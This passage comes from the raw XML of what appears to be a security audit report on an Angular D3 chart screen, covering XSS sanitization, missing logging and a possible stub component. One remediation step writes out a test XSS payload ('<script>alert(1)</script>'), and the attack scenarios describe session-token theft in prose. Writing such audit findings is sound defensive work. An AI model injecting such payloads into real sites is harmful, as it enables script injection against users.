          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DomSanitizer.sanitizeHtml()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">before passing to D3:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { DomSanitizer } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'@angular/platform-browser'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> safeHtml </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sanitizer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sanitize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(SecurityContext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> rawValue) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">??</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">d3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'.label'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(safeHtml)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement a Content Security Policy (CSP) header that disallows inline scripts (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">script-src 'self'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) to provide a defense-in-depth layer against XSS exploitation even if a D3 injection point is missed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verify by injecting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">as a data value in a test environment and confirming it is rendered as escaped text, not executed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[Not documented — WHO: the development team responsible for D3 child components; WHAT: Which specific D3 methods (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.html()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.append()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.attr()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) are used in child components rendered by</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">D3Component</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and do any of them receive data from API responses, URL parameters, or user inputs without prior sanitization?; WHERE: Insert confirmed D3 method usage and data sources into the Description and Attack Scenario sections of SEC-010]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Source Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">D3 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/d3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — Section 14</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SEC-011: No Security Logging or Monitoring — D3 Screen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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A09 — Security Logging &amp; Monitoring Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE-778: Insufficient Logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">AVSV Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V7.1.2 — Verify that all authentication decisions are logged</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">D3Component</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">— observability instrumentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Security event audit trail; XSS exploitation detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The documentation confirms that no logging or monitoring instrumentation is present in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">D3Component</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This is the third consecutive screen with no observability integration (see</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec-004">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">SEC-004</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec-008">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">SEC-008</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">). For the D3 screen specifically, the absence of logging is elevated to High severity because</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec-010">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">SEC-010</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">identifies a credible XSS risk in child components. Without logging, a successful XSS exploitation — including exfiltration of session tokens — would be undetectable from the server side. There would be no audit trail to support incident response, no alerting to trigger security team investigation, and no forensic evidence to determine the scope of a breach.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Section 10 of the D3 screen documentation states: "No</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">console.log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">console.warn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">console.error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">statements are present in the component. No error tracking service calls (Sentry, DataDog, LogRocket, Bugsnag) or analytics event calls (PostHog, Mixpanel, Google Analytics) are present in this file."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Scenario:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">An attacker successfully exploits the D3.js XSS vulnerability described in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec-010">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">SEC-010</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to exfiltrate session tokens from multiple users over a period of days. Because no client-side error monitoring or security event logging is in place, the attack is not detected until users report account compromise. The absence of logs makes it impossible to determine which users were affected, when the attack began, or what data was accessed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement a centralized Angular</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ErrorHandler</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that forwards unhandled errors to a security monitoring platform (e.g., Sentry with security event tagging).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Add CSP violation reporting (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">report-uri</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">report-to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">directive) to the Content Security Policy header — this provides server-side visibility into XSS attempts even when client-side logging is absent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Configure the monitoring platform to alert on error spikes at the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/d3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">route, which may indicate active XSS exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verify by triggering a deliberate JavaScript error in the D3 component and confirming it appears in the monitoring platform's event log within the expected SLA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Source Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">D3 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/d3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — Section 10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SEC-012: Potential Stub/Placeholder Component — Incomplete Implementation Risk</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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A04 — Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE-1059: Incomplete Documentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">AVSV Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V1.1.6 — Verify that all application components are identified and known to be needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">D3Component</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">— implementation completeness</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Unknown — depends on what the template file contains</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Section 17 of the D3 screen documentation raises a significant concern: "the complete absence of any class body — no lifecycle hooks, no injected services, no type annotations — may indicate that this component is a stub or placeholder that was never fully implemented, or that all logic was intentionally pushed into child components. A new developer should verify whether the template file (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">d3.component.html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) contains substantive content or is itself a placeholder." If</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">D3Component</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is an incomplete stub that was deployed to production, it may expose an unfinished feature with unknown security properties. Stub components sometimes contain debug code, test credentials, or permissive access configurations that were intended to be removed before production deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Section 17 of the D3 screen documentation states: "the complete absence of any class body — no lifecycle hooks, no injected services, no type annotations — may indicate that this component is a stub or placeholder that was never fully implemented."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Scenario:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">d3.component.html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">template file (not reviewed) contains a development-time debug panel or hardcoded test data that was never removed before production deployment. An authenticated user navigating to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/d3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">can access this debug content, which may expose internal data structures, API endpoint URLs, or environment configuration values.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Immediately review</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">d3.component.html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
